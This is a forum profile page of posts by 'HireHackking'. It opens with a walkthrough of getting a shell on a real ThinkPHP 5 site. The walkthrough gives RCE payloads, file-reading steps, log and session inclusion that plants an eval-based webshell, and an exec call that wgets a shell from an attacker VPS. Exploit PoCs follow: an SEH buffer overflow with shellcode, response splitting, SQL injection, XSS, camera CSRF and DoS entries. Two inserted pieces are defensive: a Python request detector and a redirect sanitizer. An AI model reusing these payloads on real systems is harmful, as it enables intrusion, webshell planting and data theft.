
Everything posted by HireHackking
-
Title: Testing TP5 website getshell methods in a real-world engagement

0x00 Introduction

I had come across few TP5 sites before, so I only knew how to getshell through the RCE vulnerability. Because of PHP version restrictions, on the card-issuing platforms that have become common recently it is not possible to obtain a shell directly with the RCE payload. So, working against one website, I tested as many getshell methods as possible in a TP5 + PHP 7.1 environment.

0x02 Main text

After obtaining the site, visit the home page as follows.

During testing I found that it was a ThinkPHP site, and the error was reported as follows.

However, the specific version is not displayed, so I don't know whether RCE exists; try it with the EXP:

_method=__construct&method=get&filter=call_user_func&get[]=phpinfo

Execution succeeded, and I found that many functions were disabled by disable_functions.

Generally, if the PHP version is below 7.1, you just use the EXP to write a shell. This method writes the shell directly with the following exp:

s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=post&filter[]=assert

However, this EXP relies on assert, and the phpinfo above shows that the PHP version is 7.1.33. Assert can no longer be used in this version, so this method cannot be used here.

Although method 2 above cannot write a shell, phpinfo does execute, so RCE exists. So I thought of reading files to get the database account and password, finding phpMyAdmin, and then writing a shell through the database.

First locate the website root directory from the phpinfo output, then use the scandir function to traverse the directory and find the database configuration file:

_method=__construct&filter[]=scandir&filter[]=var_dump&method=get&get[]=path

Then read the file via the highlight_file function:

_method=__construct&filter[]=highlight_file&method=get&get[]=<path of the file to read>

After obtaining the database information I looked for phpMyAdmin, but in the end found that it did not exist, so this method also failed.

Looking for TP5 getshell methods on forums, many experts said that log inclusion or session inclusion could be used, but I had never been exposed to these before and did not know the specifics, so I searched and tried them.

Method 3: try log inclusion

First write the shell into the log:

_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['c'])?>

Then escape through log inclusion:

_method=__construct&method=get&filter[]=Think\__include_file&server[]=phpinfo&get[]=./data/runtime/log/202110/17.log&c=phpinfo();

It failed; the log inclusion method cannot be used.

Method 4: try getshell via session inclusion

First set a session and pass in the one-line trojan:

_method=__construct&filter[]=think\session3:set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1

Then include the session file directly. TP5 session files are normally under /tmp, with the filename sess_SESSIONID (this session ID is in the cookie):

_method=__construct&method=get&filter[]=Think\__include_file&server[]=phpinfo&get[]=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic&c=phpinfo();

It executed successfully; connect with AntSword.

Getshell succeeded with www privileges.

Method 5: I already had a shell, but I tried again to see whether there were other ways to escape.

I had seen an article where exec was not disabled in disable_functions, and exec was then used to download a shell file from a VPS. So I went carefully through the functions disabled by disable_functions, and by chance found that exec was not disabled here either, so I tried it.

First create test.php on the VPS and open a port with Python:

python -m SimpleHTTPServer 8888

Download the file from the VPS:

s=wget vps/test.php&_method=__construct&method=get&filter[]=exec

It downloaded to the target machine successfully.

0x03 Summary

1. Entering a wrong path under the target website's path shows that the error page is ThinkPHP's, and the version is not displayed.

2. Enter the TP5.x RCE POC; phpinfo succeeds and shows that disable_functions disables many functions and the PHP version is 7.1.x.

http://www.xxx.com/index.php?s=captcha
POST: _method=__construct&method=get&filter=call_user_func&get[]=phpinfo

3. The following methods can get a shell directly (TP5.x + PHP 7.1.x).

Method 1 (requires PHP lower than 7.1):
http://www.xxx.com/index.php?s=captcha
POST: s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=post&filter[]=assert

Method 2 (TP5.x + PHP 7.1.x):
First find the website root directory from phpinfo, then use the scandir function to traverse the directory and find the database configuration file.
_method=__construct&method=get&filter=call_user_func&get[]=phpinfo
// the website directory is /www/wwwroot/idj/, and directory traversal obtains the website configuration directory (/www/wwwroot/wwwroot/conf) starting from the root.
_method=__construct&filter[]=scandir&filter[]=var_dump&method=get&get[]=/www/wwwroot/
_method=__construct&filter[]=scandir&filter[]=var_dump&method=get&get[]=/www/wwwroot/idj/
_method=__construct&filter[]=scandir&filter[]=var_dump&method=get&get[]=/www/wwwroot/idj/data/
_method=__construct&filter[]=scandir&filter[]=var_dump&method=get&get[]=/www/wwwroot/idj/data/conf
Then read the file via the highlight_file function to get the database connection username and password:
_method=__construct&filter[]=highlight_file&method=get&get[]=/www/wwwroot/data/data/conf/database.php
If the website is found to have phpMyAdmin, you can log in with the database user and password and write a shell via the MySQL log.

Method 3 (TP5.x + PHP 7.1.x, log inclusion):
First write the shell into the log:
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['c'])?>
Then escape through log inclusion:
_method=__construct&method=get&filter[]=Think\__include_file&server[]=phpinfo&get[]=./data/runtime/log/202110/17.log&c=phpinfo();

Method 4 (TP5.x + PHP 7.1.x, session inclusion):
First set a session and pass in the one-line trojan:
_method=__construct&filter[]=think\session3:set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1
Then include the session file directly. TP5 session files are normally under /tmp, with the filename sess_SESSIONID (this session ID is in the cookie):
_method=__construct&method=get&filter[]=Think\__include_file&server[]=phpinfo&get[]=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic&c=phpinfo();

Method 5 (TP5.x + PHP 7.1.x, exec not disabled in disable_functions):
First create test.php on the VPS and open a port with Python:
python -m SimpleHTTPServer 8888
Download the file from the VPS:
s=wget http://www.vps.com/test.php&_method=__construct&method=get&filter[]=exec

Original link: https://xz.aliyun.com/t/10397
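As an added example (not from the original post), a small Python detector that flags the request shapes used in the methods above, run over constructed request-log lines; the "method path body" log format with a recorded POST body is an assumption, since stock access logs do not keep bodies.

```python
"""Flag ThinkPHP 5 RCE-style requests (the write-up's methods 1-5) in a request log.

Added example, not part of the original post. Lines are a constructed
"<method> <path> <body>" format in which the POST body has been recorded
(a WAF or reverse proxy can do this; a stock access log cannot).
"""
from urllib.parse import parse_qsl

# Callbacks the write-up passes through filter[] / filter= (lower-cased for comparison)
DANGEROUS_FILTERS = {
    "call_user_func", "assert", "exec", "system", "scandir",
    "highlight_file", "file_put_contents", "think\\__include_file",
}

# Constructed sample log; line 4 carries only a harmless <?php phpinfo();?> tag
SAMPLE_LOG = """\
POST /index.php?s=captcha _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
POST /index.php?s=captcha _method=__construct&method=get&filter[]=Think\\__include_file&server[]=phpinfo&get[]=/tmp/sess_abc123&c=phpinfo();
POST /index.php?s=captcha _method=__construct&method=get&filter[]=exec&s=wget%20http://vps.invalid/test.php
POST /index.php?s=captcha _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=%3C%3Fphp%20phpinfo()%3B%3F%3E
POST /index.php?s=index/login username=alice&password=hunter2
GET /index.php?s=article/view&id=42 -
"""


def _params(query):
    """Decode a query string or form body into (key, value) pairs; PHP's 'x[]' keys become 'x'."""
    return [(k.lower().replace("[]", ""), v)
            for k, v in parse_qsl(query, keep_blank_values=True)]


def analyze_request(path, body):
    """Return the reasons this request matches the TP5 RCE chain ([] when clean)."""
    params = _params(path.partition("?")[2]) + _params("" if body == "-" else body)
    reasons = []
    if any(k == "_method" and v.lower() == "__construct" for k, v in params):
        reasons.append("_method=__construct overrides the request method")
    for k, v in params:
        if k == "filter" and v.lower() in DANGEROUS_FILTERS:
            reasons.append("filter callback %s" % v)
        if k in ("get", "server") and "<?php" in v.lower():
            reasons.append("PHP tag in %s[] (log/session poisoning)" % k)
        if k == "get" and "/sess_" in v:
            reasons.append("session file path in get[] (session inclusion)")
    return reasons


def scan_log(text):
    """Map 1-based line numbers of suspicious requests to their reasons."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        _method, path, body = line.split(" ", 2)
        reasons = analyze_request(path, body)
        if reasons:
            hits[n] = reasons
    return hits


if __name__ == "__main__":
    for n, reasons in scan_log(SAMPLE_LOG).items():
        print("line %d: %s" % (n, "; ".join(reasons)))
```

The same checks transfer to a WAF rule: a request body carrying _method=__construct together with a filter value is the common prefix of every method on this page.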
-
Google Chrome - Cookie Verification Denial of Service
source: https://www.securityfocus.com/bid/58857/info

Google Chrome is prone to a denial-of-service vulnerability because it fails to verify user-supplied input. Successfully exploiting this issue will allow an attacker to inject special characters into the browser's local cookie storage, resulting in the requested website always responding with an error message when it is hosted on specific web server software (like lighttpd). This will cause a denial-of-service condition.

Chromium 25.0.1364.160 is vulnerable; other versions may also be affected.

Note: The content related to Mozilla Firefox Browser has been moved to BID 62969 (Mozilla Firefox Browser Cookie Verification Denial of Service Vulnerability) for better documentation.

http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st
-
Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service
source: https://www.securityfocus.com/bid/58897/info

Apache Subversion is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.

Apache Subversion versions 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 are vulnerable.

curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo'
-
Apache Subversion - Remote Denial of Service
source: https://www.securityfocus.com/bid/58898/info

Apache Subversion is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.

Apache Subversion versions 1.7.0 through 1.7.8 are vulnerable.

curl -X REPORT --data-binary @log_report 'http://www.example.com/repo/!svn/bc/1/'
-
VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)
#********************************************************************************************************************************************
#
# Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow
# Date: 10-7-2015
# Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe
# Exploit Author: Robbie Corley
# Platform Tested: Windows 7 x64
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The title parameter contained within the c:\windows\Image2PDF.INI is vulnerable to a buffer overflow.
# This can be exploited using SEH overwrite.
#
# Instructions:
# 1. Run this sploit as-is. This will generate the new .ini file and place it in c:\windows, overwriting the existing file
# 2. Run the Image2PDF program, hit [try], file --> add files
# 3. Open any .tif file. Here's the location of one that comes with the installation: C:\Program Files (x86)\VeryPDF Image2PDF v3.2\trial.tif
# 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be greeted with your executed shellcode ;)
#**********************************************************************************************************************************************

#standard messagebox shellcode.
$shellcode = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";

$padding="\x90" x 2985;
$seh=pack('V',0x6E4B3045); #STANDARD POP POP RET
$morepadding="\x90" x 1096;

open(myfile,'>c:\\windows\\Image2PDF.INI'); #generate the dummy DWF file

#.ini file header & shellcode
print myfile "[SaveMode]
m_iMakePDFMode=0
m_iSaveMode=0
m_szFilenameORPath=
m_iDestinationMode=0
m_bAscFilename=0
m_strFileNumber=0001
[BaseSettingDlg]
m_bCheckDespeckle=0
m_bCheckSkewCorrect=0
m_bCheckView=0
m_szDPI=default
m_bCheckBWImage=1
[SetPDFInfo]
m_szAuthor=
m_szSubject=
m_szTitle=".$padding."\xEB\x06\x90\x90".$seh.$shellcode.$morepadding;

close (myfile); #close the file
-
Kallithea 0.2.9 - 'came_from' HTTP Response Splitting
Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability

Vendor: Kallithea
Product web page: https://www.kallithea-scm.org
Version affected: 0.2.9 and 0.2.2

Summary: Kallithea, a member project of Software Freedom Conservancy, is a GPLv3'd, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins.

Desc: Kallithea suffers from an HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET 'came_from' parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

Tested on: Kali Python

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Advisory ID: ZSL-2015-5267
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
Vendor: https://kallithea-scm.org/news/release-0.3.html
Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
CVE ID: 2015-5285
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285

21.09.2015

--

GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

###

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

<html>
 <head>
  <title>302 Found</title>
 </head>
 <body>
  <h1>302 Found</h1>
  The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk</a>;
  you should be redirected automatically.
 </body>
</html>
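Added example, not Kallithea's code: a validation routine for a came_from-style redirect parameter that rejects the header-injection payload from the request above and falls back to a safe default; the function names and the DEFAULT_TARGET value are assumptions.

```python
"""Validate a came_from-style redirect parameter before it reaches a Location header.

Added example, not Kallithea's code. Two checks the advisory implies are missing:
no control characters after decoding (CR/LF split the header) and no absolute or
protocol-relative URL (open redirect). Unsafe values fall back to DEFAULT_TARGET.
"""
from urllib.parse import unquote, urlsplit

DEFAULT_TARGET = "/"   # assumed safe landing page

# The advisory's request parameter, verbatim (percent-encoded as sent)
ADVISORY_PAYLOAD = ("d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk"
                    "%01%02%0d%0aLocation%3a%20http://zeroscience.mk")


def is_safe_redirect_target(raw):
    """True only for a site-relative path such as '/repo/foo?x=1' with no control bytes."""
    value = unquote(raw or "")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return False                      # CR, LF, \x01, \x02 ... corrupt or split the header
    if not value.startswith("/") or value.startswith(("//", "/\\")):
        return False                      # '//host' and '/\host' are treated as absolute by browsers
    parts = urlsplit(value)
    return parts.scheme == "" and parts.netloc == ""


def sanitize_came_from(raw):
    """Decoded value when safe, otherwise DEFAULT_TARGET."""
    return unquote(raw) if is_safe_redirect_target(raw) else DEFAULT_TARGET


def location_header(raw):
    """The header line a framework would emit after sanitizing; one line, no CRLF inside."""
    return "Location: " + sanitize_came_from(raw)


if __name__ == "__main__":
    for candidate in ("/repo/foo?x=1", ADVISORY_PAYLOAD, "//zeroscience.mk/"):
        print(repr(candidate), "->", location_header(candidate))
```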
-
PHP Address Book - '/addressbook/register/edit_user.php?id' SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/edit_user.php?id={insert}
-
PHP Address Book - '/addressbook/register/delete_user.php?id' SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/delete_user.php?id={insert}
-
PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/edit_user_save.php?id={insert}&lastname={insert}&firstname={insert}&phone={insert}&email={insert}&permissions={insert}&notes={insert}
-
PHP Address Book - '/addressbook/register/reset_password.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/reset_password.php?email={insert}&password={insert}
-
PHP Address Book - '/addressbook/register/linktick.php?site' SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/linktick.php?site={insert}
-
PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/reset_password_save.php?username={insert}&password=&password_confirm=&password_hint={insert}&email={insert}
-
PHP Address Book - '/addressbook/register/router.php?BasicLogin' Cookie SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/router.php
COOKIE var BasicLogin
-
PHP Address Book - '/addressbook/register/traffic.php?var' SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/traffic.php?var={insert}
-
PHP Address Book - '/addressbook/register/user_add_save.php?email' SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/user_add_save.php
POST var email
-
PHP Address Book - '/addressbook/register/checklogin.php?Username' SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/checklogin.php?username={insert}&password=pass
-
PHP Address Book - '/addressbook/register/admin_index.php?q' SQL Injection
source: https://www.securityfocus.com/bid/58911/info

PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.

http://www.example.com/addressbook/register/admin_index.php?q={insert}
-
Zimbra - 'aspell.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58913/info

Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/aspell.php?disctionnary=><script>alert('foo');</script>
-
Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities
source: https://www.securityfocus.com/bid/58943/info

Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

The following products are vulnerable:
Foscam FI8910W running Embedded Web Interface 2.4.10.3
Foscam FI8908W running Embedded Web Interface 2.4.10.3

http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=
-
EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection
source: https://www.securityfocus.com/bid/58945/info

EasyPHP is prone to an authentication bypass and a PHP code execution vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected application and perform arbitrary actions or execute arbitrary PHP code within the context of the web server process. Successful attacks can compromise the affected application and possibly the underlying computer.

EasyPHP 12.1 is vulnerable; other versions may also be affected.

http://www.example.com/home/index.php?to=ext
http://www.example.com/home/index.php?to=phpinfo
-
WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58948/info

The Traffic Analyzer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
-
phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/58962/info

phpMyAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

phpMyAdmin versions 3.5.0 through 3.5.7 are vulnerable.

http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[width]="><script>alert(123);</script>
http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]="><script>alert(123);</script>
-
WordPress Plugin Spiffy XSPF Player - 'playlist_id' SQL Injection
source: https://www.securityfocus.com/bid/58976/info

The Spiffy XSPF Player plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Spiffy XSPF Player 0.1 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]
-
PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service
Hello, I want to report the following exploit:

# Exploit Title: PHPMyLicense Stored Cross Site Scripting
# Date: 09-10-2015
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
# Website: https://websec-test.com
# Vendor Homepage: https://phpmylicense.com
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
# Version: 3.0.0 - 3.1.4 (REQUIRED)
# Category: Webapps

1.) Description:
Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.

2.) Proof of Concept:
localhost/phpmylicense/ajax/
POST: comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing

3.) Solution:
None. - No Update available for it.
-
Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' File Crush Application (Denial of Service)
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application)
# Date: [8-10-2015]
# Exploit Author: [M.Ibrahim] vulnbug@gmail.com
# E-Mail: vulnbug <at> gmail.com
# Vendor Homepage: http://www.tomabo.com/mp4-converter/index.html
# Version: [3.10.12]
# Tested on: windows 7 x86

junk = "A" * 600000        # oversized playlist entry that crashes the converter on open
file = "exploit.m3u"
f = open(file, "w")
f.write(junk)
f.close()